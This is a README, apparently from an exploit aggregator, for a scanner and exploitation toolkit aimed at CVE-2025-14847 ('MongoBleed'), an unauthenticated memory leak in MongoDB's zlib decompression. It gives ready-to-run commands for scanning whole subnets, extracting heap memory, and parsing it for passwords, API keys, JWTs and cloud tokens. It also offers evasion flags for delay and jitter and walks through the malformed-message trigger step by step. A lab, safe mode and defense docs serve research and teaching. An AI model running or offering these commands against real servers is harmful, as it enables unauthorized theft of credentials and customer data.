Share
## https://sploitus.com/exploit?id=871BCC5A-748C-5506-8347-2C2F15C1CCED
# MongoBleed

**CVE-2025-14847 Scanner and Exploitation Toolkit**

A security research toolkit for MongoBleed -- a critical unauthenticated memory leak in MongoDB's zlib decompression that allows attackers to extract sensitive data from server heap memory without authentication.

```
โ•”โ•ฆโ•—โ”Œโ”€โ”โ”Œโ”โ”Œโ”Œโ”€โ”โ”Œโ”€โ”โ•”โ•— โ”ฌ  โ”Œโ”€โ”โ”Œโ”€โ”โ”Œโ”ฌโ”
โ•‘โ•‘โ•‘โ”‚ โ”‚โ”‚โ”‚โ”‚โ”‚ โ”ฌโ”‚ โ”‚โ• โ•ฉโ•—โ”‚  โ”œโ”ค โ”œโ”ค  โ”‚โ”‚
โ•ฉ โ•ฉโ””โ”€โ”˜โ”˜โ””โ”˜โ””โ”€โ”˜โ””โ”€โ”˜โ•šโ•โ•โ”ดโ”€โ”˜โ””โ”€โ”˜โ””โ”€โ”˜โ”€โ”ดโ”˜
CVE-2025-14847 Scanner & Exploit
```

## Quick Start

```bash
# No external dependencies -- Python 3 standard library only
cd cli

# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017

# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24

# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials

# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
```

## Repository Structure

```
MongoBleed/
โ”œโ”€โ”€ cli/                          # Command-line scanner and exploitation tool
โ”‚   โ”œโ”€โ”€ mongobleed.py             # Main CLI tool
โ”‚   โ”œโ”€โ”€ requirements.txt          # Python dependencies (stdlib only)
โ”‚   โ””โ”€โ”€ README.md                 # CLI documentation
โ”œโ”€โ”€ lab/                          # Docker-based CTF lab environment
โ”‚   โ”œโ”€โ”€ docker-compose.yml        # Multi-container lab setup
โ”‚   โ”œโ”€โ”€ vulnerable/               # Vulnerable MongoDB configurations
โ”‚   โ”œโ”€โ”€ patched/                  # Patched MongoDB for comparison
โ”‚   โ”œโ”€โ”€ no-zlib/                  # Non-exploitable (zlib disabled)
โ”‚   โ”œโ”€โ”€ monitoring/               # Attack visualization dashboard
โ”‚   โ”œโ”€โ”€ warmup-heap.sh            # Populate heap with sensitive data
โ”‚   โ””โ”€โ”€ README.md                 # Lab setup instructions
โ”œโ”€โ”€ nuclei/                       # Nuclei scanning templates
โ”‚   โ”œโ”€โ”€ CVE-2025-14847.yaml       # Active exploitation template
โ”‚   โ”œโ”€โ”€ CVE-2025-14847-safe.yaml  # Safe detection template
โ”‚   โ””โ”€โ”€ README.md                 # Nuclei template docs
โ”œโ”€โ”€ docs/                         # Educational documentation
โ”‚   โ”œโ”€โ”€ README.md                 # Learning path index
โ”‚   โ”œโ”€โ”€ 01-fundamentals.md        # MongoDB & memory basics
โ”‚   โ”œโ”€โ”€ 02-vulnerability.md       # CVE-2025-14847 deep dive
โ”‚   โ”œโ”€โ”€ 03-exploitation.md        # Hands-on exploitation
โ”‚   โ”œโ”€โ”€ 04-detection.md           # Hunting and detection
โ”‚   โ””โ”€โ”€ 05-defense.md             # Mitigation strategies
โ””โ”€โ”€ README.md                     # This file
```

## Features

### CLI Tool
- Version fingerprinting and compression detection (zlib/snappy/zstd)
- Vulnerability detection with safe mode option
- Memory extraction via offset scanning (configurable range)
- Credential pattern detection (16 patterns: passwords, API keys, JWTs, AWS keys, MongoDB URIs, etc.)
- CIDR notation support (`192.168.1.0/24`, `10.0.0.0/16:27018`)
- Batch scanning from target files with multi-threading
- Continuous extraction mode
- Hexdump and printable string extraction
- JSON output and file export
- Evasion controls (delay, jitter)
- Colored terminal output

### Lab Environment
- Multiple vulnerable MongoDB versions (4.4.29, 6.0.26, 8.0.16)
- Patched version for comparison (8.0.17)
- No-zlib version demonstrating mitigation
- Pre-seeded with realistic sensitive data
- CTF-style flags for learning
- Monitoring dashboard with attack visualization
- Heap warmup script for reliable exploitation demos

### Nuclei Templates
- Safe detection template (version + compression check only)
- Active exploitation template (version + zlib confirmation)

## Usage

### Detection

```bash
# Check single target
python mongobleed.py -t localhost:27017

# Check with verbose output
python mongobleed.py -t localhost:27017 -v

# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s

# Show version info
python mongobleed.py -t localhost:27017 --version
```

### Network Scanning

```bash
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24

# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018

# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json

# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
```

### Memory Extraction

```bash
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e

# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500

# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous

# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
```

### Analysis

```bash
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials

# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens

# Extract printable strings
python mongobleed.py -t target:27017 -e --strings

# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
```

### Evasion

```bash
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500

# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
```

### Nuclei Templates

```bash
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017

# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017

# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
```

### Lab Environment

```bash
# Start all containers
cd lab && docker compose up -d

# Services:
# - localhost:27017  MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018  MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019  MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020  MongoDB 8.0.17 (Patched)
# - localhost:27021  MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080   Monitoring Dashboard

# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50

# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
```

## CLI Options

```
Target:
  -t, --target TARGET     Target host:port or CIDR range (e.g. 192.168.1.0/24)
  -T, --targets FILE      File with target list (supports CIDR per line)

Detection:
  --detect                Detect if target is vulnerable (default action)
  --version               Show MongoDB version
  -s, --safe              Safe mode - detection only, no exploitation

Exploitation:
  -e, --extract           Extract memory via offset scanning
  --min-offset N          Minimum offset to probe (default: 20)
  --max-offset N          Maximum offset to probe (default: 8192)
  --continuous            Continuous extraction mode
  --force                 Force extraction even if version check fails

Analysis:
  --credentials           Parse for credentials
  --tokens                Parse for tokens
  --strings               Extract printable strings
  --hexdump               Display hexdump

Evasion:
  --delay MS              Delay between requests (milliseconds)
  --jitter                Random delay jitter

Output:
  -o, --output FILE       Output file (JSON)
  -v, --verbose           Verbose output
  -q, --quiet             Quiet mode
  --json                  JSON output
  --no-color              Disable colors

Connection:
  --timeout SECS          Connection timeout (default: 10)
  -j, --threads N         Threads for batch scanning (default: 10)
```

## Credential Detection Patterns

The tool searches extracted memory for the following patterns:

| Type | Example Pattern |
|------|----------------|
| password | `password: value`, `passwd=value` |
| secret | `secret: value` |
| api_key | `api_key: sk_live_...` |
| token | `token: ...` (16+ chars) |
| bearer_token | `Bearer eyJ...` |
| jwt | `eyJ...` (Base64 JWT) |
| mongodb_uri | `mongodb://user:pass@host` |
| postgres_uri | `postgresql://...` |
| redis_uri | `redis://...` |
| stripe_key | `sk_live_...` |
| openai_key | `sk-...` (48+ chars) |
| aws_access_key | `AKIA...` |
| github_token | `ghp_...` |
| slack_token | `xoxb-...`, `xoxp-...` |
| ctf_flag | `FLAG{...}` |

## CVE-2025-14847 Details

| Item | Value |
|------|-------|
| **CVE** | CVE-2025-14847 |
| **Name** | MongoBleed |
| **CWE** | CWE-130 (Improper Handling of Length Parameter) |
| **CVSS** | 8.7 (High) |
| **Type** | Unauthenticated Memory Leak |
| **Disclosed** | December 19, 2025 |
| **Exploited ITW** | December 29, 2025 |

### Affected Versions

| Branch | Vulnerable | Patched |
|--------|------------|---------|
| 8.2.x | 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 - 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 - 4.4.29 | 4.4.30 |
| 4.2.x | All versions | EOL - No patch |
| 4.0.x | All versions | EOL - No patch |
| 3.6.x | All versions | EOL - No patch |

### How It Works

MongoBleed exploits a flaw in MongoDB's zlib message decompression (`message_compressor_zlib.cpp`). The vulnerable code returns the allocated buffer size instead of the actual decompressed length, allowing attackers to read uninitialized heap memory.

```
1. CONNECT (no authentication required)
              โ†“
2. SEND MALFORMED OP_COMPRESSED
   โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
   โ”‚ originalOpcode: OP_MSG (2013)    โ”‚
   โ”‚ uncompressedSize: INFLATED       โ”‚ โ† Bug trigger
   โ”‚ compressorId: zlib (2)           โ”‚
   โ”‚ compressedMessage: [small data]  โ”‚
   โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
              โ†“
3. SERVER ALLOCATES OVERSIZED BUFFER
   [ small real data | uninitialized heap memory ]
              โ†“
4. BSON PARSER READS INTO HEAP GARBAGE
   Inflated document length causes parser to read
   beyond actual data into heap memory
              โ†“
5. ERROR RESPONSE LEAKS MEMORY
   "invalid BSON field name 'password=secret123...'"
```

### What Can Be Leaked

- Database credentials and passwords
- API keys and tokens
- Session tokens and JWTs
- MongoDB connection strings
- Application secrets from memory
- Customer PII from recent queries
- Internal configuration data

## Credits

- **Joe Desimone** (Elastic Security) - Original PoC and vulnerability naming
- **MongoDB Security Team** - Patch development
- **Wiz Research** - In-the-wild exploitation analysis
- **Eric Capuano** - Detection signatures and Velociraptor artifact

## References

- [MongoDB Security Advisory](https://www.mongodb.com/docs/manual/release-notes/)
- [Wiz Blog - MongoBleed Analysis](https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb)
- [Hunting MongoBleed - Eric Capuano](https://blog.ecapuano.com/p/hunting-mongobleed-cve-2025-14847)
- [Original PoC - joe-desimone/mongobleed](https://github.com/joe-desimone/mongobleed)
- [NVD - CVE-2025-14847](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)

## Disclaimer

This toolkit is provided for **authorized security testing, research, and educational purposes only**. Only use against systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## License

MIT License